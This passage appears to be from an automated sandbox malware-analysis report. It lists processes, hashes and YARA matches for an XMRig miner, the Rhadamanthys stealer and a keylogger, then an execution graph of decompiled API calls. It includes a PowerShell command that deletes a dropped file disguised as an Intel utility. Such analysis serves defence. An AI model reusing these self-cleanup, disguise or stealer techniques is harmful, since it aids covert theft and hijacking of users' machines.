                                                                                                                                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000024.00000003.2335547631.000001AB56C60000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          • Detection: 67%, ReversingLabs
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                          Start time:03:07:33
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:explorer.exe
                                                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.2341019039.0000000000526000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.2341019039.000000000050A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.2341537822.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.2341646325.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.2341019039.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                          Start time:03:07:33
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                          Start time:03:07:33
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                          Start time:03:07:34
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                          Imagebase:0x7ff7be5e0000
                                                                                                                                                                                          File size:22'528 bytes
                                                                                                                                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                          Start time:03:07:36
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                          Imagebase:0x270000
                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000029.00000003.2360437408.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000029.00000002.2372633132.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                          Start time:03:07:36
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 640
                                                                                                                                                                                          Imagebase:0x760000
                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                          Start time:03:07:39
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                          File size:765'568 bytes
                                                                                                                                                                                          MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 75%, ReversingLabs
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                          Start time:03:07:39
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                          Start time:03:07:41
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                                                                                                                                                                                          Imagebase:0x90000
                                                                                                                                                                                          File size:765'568 bytes
                                                                                                                                                                                          MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                          Start time:03:08:01
                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                          Imagebase:0x7ff719200000
                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:3.8%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:3.7%
                                                                                                                                                                                            Total number of Nodes:755
                                                                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                                                                            execution_graph 12307 893c8e 12308 893c98 12307->12308 12310 893ca5 12308->12310 12315 892410 12308->12315 12311 893ccf 12310->12311 12319 893810 12310->12319 12313 893810 4 API calls 12311->12313 12314 893cdb 12313->12314 12316 892424 12315->12316 12323 8ab52d 12316->12323 12320 89381c 12319->12320 12372 892440 12320->12372 12331 8c3aed 12323->12331 12325 8ab5a5 ___std_exception_copy 12338 8ab1ad 12325->12338 12326 8ab598 12334 8aaf56 12326->12334 12330 89242a 12330->12310 12342 8c4f29 12331->12342 12333 8ab555 12333->12325 12333->12326 12333->12330 12335 8aaf9f ___std_exception_copy 12334->12335 12337 8aafb2 shared_ptr 12335->12337 12348 8ab39f 12335->12348 12337->12330 12339 8ab1d8 12338->12339 12341 8ab1e1 shared_ptr 12338->12341 12340 8ab39f 5 API calls 12339->12340 12340->12341 12341->12330 12343 8c4f2e __fassign 12342->12343 12343->12333 12344 8cd634 __fassign 4 API calls 12343->12344 12346 8c8bfc ___std_exception_copy 12343->12346 12344->12346 12345 8c65ed __fassign 3 API calls 12347 8c8c2f 12345->12347 12346->12345 12359 8abedf 12348->12359 12351 8ab3e8 12351->12337 12368 8acc31 12359->12368 12362 8c6cbb 12363 8c6cc7 __fassign 12362->12363 12364 8ca671 __fassign 4 API calls 12363->12364 12367 8c6ccc 12364->12367 12365 8c8bec __fassign 4 API calls 12366 8c6cf6 12365->12366 12367->12365 12369 8acc3f InitOnceExecuteOnce 12368->12369 12371 8ab3e1 12368->12371 12369->12371 12371->12351 12371->12362 12375 8ab5d6 12372->12375 12374 892472 12377 8ab5f1 Concurrency::cancel_current_task 12375->12377 12376 8c8bec __fassign 4 API calls 12378 8ab69f 12376->12378 12377->12376 12379 8ab658 __fassign std::future_error::future_error 12377->12379 12379->12374 12664 8c6a44 12665 8c6a5c 12664->12665 12666 8c6a52 12664->12666 12669 8c698d 12665->12669 12668 8c6a76 ___free_lconv_mon 12670 8c690a __fassign 4 API calls 12669->12670 12671 8c699f 12670->12671 12671->12668 12067 898780 12068 898786 12067->12068 12074 8c6729 12068->12074 12071 8987a6 12073 8987a0 12081 8c6672 12074->12081 12076 898793 12076->12071 12077 8c67b7 12076->12077 12078 8c67c3 __fassign 12077->12078 12080 8c67cd ___std_exception_copy 12078->12080 12097 8c6740 12078->12097 12080->12073 12082 8c667e __fassign 12081->12082 12083 8c6685 ___std_exception_copy 12082->12083 12085 8ca8c3 12082->12085 12083->12076 12086 8ca8cf __fassign 12085->12086 12089 8ca967 12086->12089 12088 8ca8ea 12088->12083 12092 8ca98a 12089->12092 12091 8ca9d0 ___free_lconv_mon 12091->12088 12092->12091 12093 8cd82f 12092->12093 12096 8cd83c __fassign 12093->12096 12094 8cd867 RtlAllocateHeap 12095 8cd87a 12094->12095 12094->12096 12095->12091 12096->12094 12096->12095 12098 8c6762 12097->12098 12100 8c674d ___std_exception_copy ___free_lconv_mon 12097->12100 12098->12100 12101 8ca038 12098->12101 12100->12080 12102 8ca050 12101->12102 12104 8ca075 12101->12104 12102->12104 12105 8d0439 12102->12105 12104->12100 12106 8d0445 __fassign 12105->12106 12108 8d044d __dosmaperr ___std_exception_copy 12106->12108 12109 8d052b 12106->12109 12108->12104 12110 8d054d 12109->12110 12114 8d0551 __dosmaperr ___std_exception_copy 12109->12114 12110->12114 12115 8d00d2 12110->12115 12114->12108 12117 8d00e3 12115->12117 12116 8d0106 12116->12114 12119 8cfcc0 12116->12119 12117->12116 12126 8ca671 12117->12126 12120 8cfd0d 12119->12120 12159 8c690a 12120->12159 12123 8cffbc std::future_error::future_error 12123->12114 12124 8cc719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12125 8cfd1c __cftof __fassign 12124->12125 12125->12123 12125->12124 12125->12125 12167 8cb67d 12125->12167 12127 8ca67b __fassign 12126->12127 12128 8cd82f __fassign RtlAllocateHeap 12127->12128 12129 8ca694 __fassign ___free_lconv_mon 12127->12129 12128->12129 12130 8ca722 12129->12130 12133 8c8bec 12129->12133 12130->12116 12134 8c8bf1 __fassign 12133->12134 12138 8c8bfc ___std_exception_copy 12134->12138 12139 8cd634 12134->12139 12153 8c65ed 12138->12153 12141 8cd640 __fassign 12139->12141 12140 8cd69c ___std_exception_copy 12140->12138 12141->12140 12142 8cd81b __fassign 12141->12142 12143 8cd726 12141->12143 12145 8cd751 __fassign 12141->12145 12144 8c65ed __fassign 3 API calls 12142->12144 12143->12145 12156 8cd62b 12143->12156 12147 8cd82e 12144->12147 12145->12140 12148 8ca671 __fassign 4 API calls 12145->12148 12151 8cd7a5 12145->12151 12148->12151 12150 8cd62b __fassign 4 API calls 12150->12145 12151->12140 12152 8ca671 __fassign 4 API calls 12151->12152 12152->12140 12154 8c64c7 __fassign 3 API calls 12153->12154 12155 8c65fe 12154->12155 12157 8ca671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12156->12157 12158 8cd630 12157->12158 12158->12150 12160 8c692a 12159->12160 12166 8c6921 12159->12166 12161 8ca671 __fassign 4 API calls 12160->12161 12160->12166 12162 8c694a 12161->12162 12172 8cb5fb 12162->12172 12166->12125 12168 8ca671 __fassign 4 API calls 12167->12168 12169 8cb688 12168->12169 12170 8cb5fb __fassign 4 API calls 12169->12170 12171 8cb698 12170->12171 12171->12125 12173 8cb60e 12172->12173 12174 8c6960 12172->12174 12173->12174 12180 8cf5ab 12173->12180 12176 8cb628 12174->12176 12177 8cb63b 12176->12177 12179 8cb650 12176->12179 12177->12179 12187 8ce6b1 12177->12187 12179->12166 12181 8cf5b7 __fassign 12180->12181 12182 8ca671 __fassign 4 API calls 12181->12182 12184 8cf5c0 __fassign 12182->12184 12183 8cf606 12183->12174 12184->12183 12185 8c8bec __fassign 4 API calls 12184->12185 12186 8cf62b 12185->12186 12188 8ca671 __fassign 4 API calls 12187->12188 12189 8ce6bb 12188->12189 12192 8ce5c9 12189->12192 12191 8ce6c1 12191->12179 12196 8ce5d5 __fassign ___free_lconv_mon 12192->12196 12193 8ce5f6 12193->12191 12194 8c8bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12195 8ce668 12194->12195 12197 8ce6a4 12195->12197 12198 8ca72e __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12195->12198 12196->12193 12196->12194 12197->12191 12199 8ce695 12198->12199 12200 8ce4b0 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12199->12200 12200->12197 12401 8920c0 12402 8ac68b __Mtx_init_in_situ 2 API calls 12401->12402 12403 8920cc 12402->12403 12404 89e0c0 recv 12405 89e122 recv 12404->12405 12406 89e157 recv 12405->12406 12408 89e191 12406->12408 12407 89e2b3 std::future_error::future_error 12408->12407 12413 8ac6ac 12408->12413 12420 8ac452 12413->12420 12415 89e2ee 12416 8ac26a 12415->12416 12417 8ac292 12416->12417 12418 8ac274 12416->12418 12417->12417 12418->12417 12437 8ac297 12418->12437 12421 8ac4a8 12420->12421 12423 8ac47a std::future_error::future_error 12420->12423 12421->12423 12426 8acf6b 12421->12426 12423->12415 12424 8ac4fd __Xtime_diff_to_millis2 12424->12423 12425 8acf6b _xtime_get GetSystemTimePreciseAsFileTime 12424->12425 12425->12424 12427 8acf7a 12426->12427 12429 8acf87 __aulldvrm 12426->12429 12427->12429 12430 8acf44 12427->12430 12429->12424 12433 8acbea 12430->12433 12434 8acbfb GetSystemTimePreciseAsFileTime 12433->12434 12435 8acc07 12433->12435 12434->12435 12435->12429 12440 892ae0 12437->12440 12439 8ac2ae Concurrency::cancel_current_task 12441 8abedf InitOnceExecuteOnce 12440->12441 12443 892af4 __fassign 12441->12443 12442 892aff 12442->12439 12443->12442 12444 8ca671 __fassign 4 API calls 12443->12444 12447 8c6ccc 12444->12447 12445 8c8bec __fassign 4 API calls 12446 8c6cf6 12445->12446 12447->12445 12501 898980 12503 898aea 12501->12503 12504 8989d8 shared_ptr 12501->12504 12502 895c10 6 API calls 12502->12504 12504->12502 12504->12503 12660 892e00 12661 892e28 12660->12661 12662 8ac68b __Mtx_init_in_situ 2 API calls 12661->12662 12663 892e33 12662->12663 12448 8ad0c7 12449 8ad0d7 12448->12449 12450 8ad17f 12449->12450 12451 8ad17b RtlWakeAllConditionVariable 12449->12451 13018 899f44 13020 899f4c shared_ptr 13018->13020 13019 89a953 Sleep CreateMutexA 13021 89a98e 13019->13021 13020->13019 13022 89a01f shared_ptr 13020->13022 12461 893c47 12462 893c51 12461->12462 12463 893c5f 12462->12463 12468 8932d0 12462->12468 12465 893c68 12463->12465 12466 893810 4 API calls 12463->12466 12467 893cdb 12466->12467 12469 8ac6ac GetSystemTimePreciseAsFileTime 12468->12469 12475 893314 12469->12475 12470 89336b 12471 8ac26a 5 API calls 12470->12471 12473 89333c __Mtx_unlock 12471->12473 12474 8ac26a 5 API calls 12473->12474 12476 893350 std::future_error::future_error 12473->12476 12477 893377 12474->12477 12475->12470 12475->12473 12487 8abd4c 12475->12487 12476->12463 12478 8ac6ac GetSystemTimePreciseAsFileTime 12477->12478 12479 8933af 12478->12479 12480 8ac26a 5 API calls 12479->12480 12481 8933b6 __Cnd_broadcast 12479->12481 12480->12481 12482 8ac26a 5 API calls 12481->12482 12483 8933d7 __Mtx_unlock 12481->12483 12482->12483 12484 8ac26a 5 API calls 12483->12484 12485 8933eb 12483->12485 12486 89340e 12484->12486 12485->12463 12486->12463 12490 8abb72 12487->12490 12489 8abd5c 12489->12475 12491 8abb9c 12490->12491 12492 8acf6b _xtime_get GetSystemTimePreciseAsFileTime 12491->12492 12495 8abba4 __Xtime_diff_to_millis2 std::future_error::future_error 12491->12495 12493 8abbcf __Xtime_diff_to_millis2 12492->12493 12494 8acf6b _xtime_get GetSystemTimePreciseAsFileTime 12493->12494 12493->12495 12494->12495 12495->12489 12595 89215a 12598 8ac6fc 12595->12598 12597 892164 12599 8ac70c 12598->12599 12600 8ac724 12598->12600 12599->12600 12602 8acfbe 12599->12602 12600->12597 12603 8accd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12602->12603 12604 8acfd0 12603->12604 12604->12599 12646 899adc 12647 899aea 12646->12647 12651 899afe shared_ptr 12646->12651 12648 89a917 12647->12648 12647->12651 12649 89a953 Sleep CreateMutexA 12648->12649 12650 89a98e 12649->12650 12652 895c10 6 API calls 12651->12652 12653 899b7c 12652->12653 12654 898b30 6 API calls 12653->12654 12655 899b8d 12654->12655 12656 895c10 6 API calls 12655->12656 12657 899cb1 12656->12657 12658 898b30 6 API calls 12657->12658 12659 899cc2 12658->12659 12675 893f9f 12676 893fad 12675->12676 12677 893fb6 12675->12677 12678 892410 5 API calls 12676->12678 12678->12677 12679 892b90 12680 892bce 12679->12680 12681 8ab7fb TpReleaseWork 12680->12681 12682 892bdb shared_ptr std::future_error::future_error 12681->12682 12877 892b10 12878 892b1a 12877->12878 12879 892b1c 12877->12879 12880 8ac26a 5 API calls 12879->12880 12881 892b22 12880->12881 12759 8a87d0 12760 8a882a __cftof 12759->12760 12766 8a9bb0 12760->12766 12764 8a88d9 std::_Throw_future_error 12765 8a886c std::future_error::future_error 12779 8a9ef0 12766->12779 12768 8a9be5 12783 892ce0 12768->12783 12770 8a9c16 12792 8a9f70 12770->12792 12772 8a8854 12772->12765 12773 8943f0 12772->12773 12774 8abedf InitOnceExecuteOnce 12773->12774 12775 89440a 12774->12775 12776 894411 12775->12776 12777 8c6cbb 4 API calls 12775->12777 12776->12764 12778 894424 12777->12778 12780 8a9f0c 12779->12780 12781 8ac68b __Mtx_init_in_situ 2 API calls 12780->12781 12782 8a9f17 12781->12782 12782->12768 12784 892d1d 12783->12784 12785 8abedf InitOnceExecuteOnce 12784->12785 12786 892d46 12785->12786 12787 892d51 std::future_error::future_error 12786->12787 12788 892d88 12786->12788 12797 8abef7 12786->12797 12787->12770 12790 892440 4 API calls 12788->12790 12791 892d9b 12790->12791 12791->12770 12795 8a9fef shared_ptr 12792->12795 12794 8aa058 12795->12794 12810 8aa210 12795->12810 12796 8aa03b 12796->12772 12798 8abf03 Concurrency::cancel_current_task 12797->12798 12799 8abf6a 12798->12799 12800 8abf73 12798->12800 12804 8abe7f 12799->12804 12802 892ae0 5 API calls 12800->12802 12803 8abf6f 12802->12803 12803->12788 12805 8acc31 InitOnceExecuteOnce 12804->12805 12806 8abe97 12805->12806 12807 8abe9e 12806->12807 12808 8c6cbb 4 API calls 12806->12808 12807->12803 12809 8abea7 12808->12809 12809->12803 12811 8aa290 12810->12811 12817 8a71d0 12811->12817 12813 8aa2cc shared_ptr 12814 8aa4be shared_ptr 12813->12814 12815 893ee0 3 API calls 12813->12815 12814->12796 12816 8aa4a6 12815->12816 12816->12796 12818 8a7211 12817->12818 12825 893970 12818->12825 12820 8a7446 std::future_error::future_error 12820->12813 12821 8a72ad __cftof 12821->12820 12822 8ac68b __Mtx_init_in_situ 2 API calls 12821->12822 12823 8a7401 12822->12823 12830 892ec0 12823->12830 12826 8ac68b __Mtx_init_in_situ 2 API calls 12825->12826 12827 8939a7 12826->12827 12828 8ac68b __Mtx_init_in_situ 2 API calls 12827->12828 12829 8939e6 12828->12829 12829->12821 12831 892f06 12830->12831 12834 892f6f 12830->12834 12832 8ac6ac GetSystemTimePreciseAsFileTime 12831->12832 12833 892f12 12832->12833 12836 89301e 12833->12836 12840 892f1d __Mtx_unlock 12833->12840 12835 892fef 12834->12835 12841 8ac6ac GetSystemTimePreciseAsFileTime 12834->12841 12835->12820 12837 8ac26a 5 API calls 12836->12837 12838 893024 12837->12838 12839 8ac26a 5 API calls 12838->12839 12842 892fb9 12839->12842 12840->12834 12840->12838 12841->12842 12843 8ac26a 5 API calls 12842->12843 12844 892fc0 __Mtx_unlock 12842->12844 12843->12844 12845 8ac26a 5 API calls 12844->12845 12846 892fd8 __Cnd_broadcast 12844->12846 12845->12846 12846->12835 12847 8ac26a 5 API calls 12846->12847 12848 89303c 12847->12848 12849 8ac6ac GetSystemTimePreciseAsFileTime 12848->12849 12859 893080 shared_ptr __Mtx_unlock 12849->12859 12850 8931c5 12851 8ac26a 5 API calls 12850->12851 12852 8931cb 12851->12852 12853 8ac26a 5 API calls 12852->12853 12854 8931d1 12853->12854 12855 8ac26a 5 API calls 12854->12855 12861 893193 __Mtx_unlock 12855->12861 12856 8931a7 std::future_error::future_error 12856->12820 12857 8ac26a 5 API calls 12858 8931dd 12857->12858 12859->12850 12859->12852 12859->12856 12860 8ac6ac GetSystemTimePreciseAsFileTime 12859->12860 12862 89315f 12860->12862 12861->12856 12861->12857 12862->12850 12862->12854 12862->12861 12863 8abd4c GetSystemTimePreciseAsFileTime 12862->12863 12863->12862 12535 8ad111 12536 8ad122 12535->12536 12537 8ad12a 12536->12537 12539 8ad199 12536->12539 12540 8ad1a7 SleepConditionVariableCS 12539->12540 12542 8ad1c0 12539->12542 12540->12542 12542->12536 12205 89a856 12206 89a870 12205->12206 12207 89a892 shared_ptr 12205->12207 12206->12207 12208 89a94e 12206->12208 12211 89a8a0 12207->12211 12221 897d30 12207->12221 12212 89a953 Sleep CreateMutexA 12208->12212 12210 89a8ae 12210->12211 12213 897d30 7 API calls 12210->12213 12217 89a98e 12212->12217 12214 89a8b8 12213->12214 12214->12211 12215 897d30 7 API calls 12214->12215 12216 89a8c2 12215->12216 12216->12211 12218 897d30 7 API calls 12216->12218 12219 89a8cc 12218->12219 12219->12211 12220 897d30 7 API calls 12219->12220 12220->12211 12222 897d96 __cftof 12221->12222 12228 897ee8 shared_ptr std::future_error::future_error 12222->12228 12260 895c10 12222->12260 12224 897dd2 12225 895c10 6 API calls 12224->12225 12226 897dff shared_ptr 12225->12226 12227 897ed3 GetNativeSystemInfo 12226->12227 12226->12228 12229 897ed7 12226->12229 12227->12229 12228->12210 12229->12228 12230 898019 12229->12230 12231 897f3f 12229->12231 12233 895c10 6 API calls 12230->12233 12232 895c10 6 API calls 12231->12232 12234 897f67 12232->12234 12235 89804c 12233->12235 12236 895c10 6 API calls 12234->12236 12237 895c10 6 API calls 12235->12237 12239 897f86 12236->12239 12238 89806b 12237->12238 12241 895c10 6 API calls 12238->12241 12270 8c8bbe 12239->12270 12242 8980a3 12241->12242 12243 895c10 6 API calls 12242->12243 12244 8980f4 12243->12244 12245 895c10 6 API calls 12244->12245 12246 898113 12245->12246 12247 895c10 6 API calls 12246->12247 12248 89814b 12247->12248 12249 895c10 6 API calls 12248->12249 12250 89819c 12249->12250 12251 895c10 6 API calls 12250->12251 12252 8981bb 12251->12252 12253 895c10 6 API calls 12252->12253 12254 8981f3 12253->12254 12255 895c10 6 API calls 12254->12255 12256 898244 12255->12256 12257 895c10 6 API calls 12256->12257 12258 898263 12257->12258 12259 895c10 6 API calls 12258->12259 12259->12228 12261 895c54 12260->12261 12273 894b30 12261->12273 12263 895d17 shared_ptr std::future_error::future_error 12263->12224 12264 895c7b __cftof 12264->12263 12265 895da7 RegOpenKeyExA 12264->12265 12266 895e00 RegCloseKey 12265->12266 12268 895e26 12266->12268 12267 895ea6 shared_ptr std::future_error::future_error 12267->12224 12268->12267 12269 895c10 4 API calls 12268->12269 12301 8c8868 12270->12301 12272 8c8bdc 12272->12228 12274 894b92 12273->12274 12275 894ce5 12273->12275 12274->12275 12277 8c6da6 12274->12277 12275->12264 12278 8c6db4 12277->12278 12279 8c6dc2 __fassign 12277->12279 12282 8c6d19 12278->12282 12279->12274 12283 8c690a __fassign 4 API calls 12282->12283 12284 8c6d2c 12283->12284 12287 8c6d52 12284->12287 12286 8c6d3d 12286->12274 12288 8c6d8f 12287->12288 12289 8c6d5f 12287->12289 12290 8cb67d 4 API calls 12288->12290 12291 8c6d6e __fassign 12289->12291 12293 8cb6a1 12289->12293 12290->12291 12291->12286 12294 8c690a __fassign 4 API calls 12293->12294 12295 8cb6be 12294->12295 12297 8cb6ce std::future_error::future_error 12295->12297 12298 8cf1bf 12295->12298 12297->12291 12299 8c690a __fassign 4 API calls 12298->12299 12300 8cf1df __cftof __fassign __freea std::future_error::future_error 12299->12300 12300->12297 12302 8c887a 12301->12302 12303 8c690a __fassign 4 API calls 12302->12303 12306 8c888f ___std_exception_copy 12302->12306 12305 8c88bf 12303->12305 12304 8c6d52 4 API calls 12304->12305 12305->12304 12305->12306 12306->12272 12047 8c6629 12050 8c64c7 12047->12050 12051 8c64d5 __fassign 12050->12051 12052 8c6520 12051->12052 12055 8c652b 12051->12055 12054 8c652a 12061 8ca302 GetPEB 12055->12061 12057 8c6535 12058 8c654a __fassign 12057->12058 12059 8c653a GetPEB 12057->12059 12060 8c6562 ExitProcess 12058->12060 12059->12058 12062 8ca31c __fassign 12061->12062 12062->12057 12063 89b1a0 12064 89b1f2 12063->12064 12065 89b3ad CoInitialize 12064->12065 12066 89b3fa shared_ptr std::future_error::future_error 12065->12066 12380 8920a0 12383 8ac68b 12380->12383 12382 8920ac 12386 8ac3d5 12383->12386 12385 8ac69b 12385->12382 12387 8ac3eb 12386->12387 12388 8ac3e1 12386->12388 12387->12385 12389 8ac39e 12388->12389 12390 8ac3be 12388->12390 12389->12387 12395 8accd5 12389->12395 12399 8acd0a 12390->12399 12392 8ac3d0 12392->12385 12396 8ac3b7 12395->12396 12397 8acce3 InitializeCriticalSectionEx 12395->12397 12396->12385 12397->12396 12400 8acd1f RtlInitializeConditionVariable 12399->12400 12400->12392 12543 894120 12544 89416a 12543->12544 12546 8941b2 std::future_error::future_error 12544->12546 12547 893ee0 12544->12547 12548 893f48 12547->12548 12552 893f1e 12547->12552 12550 893f58 12548->12550 12553 892c00 12548->12553 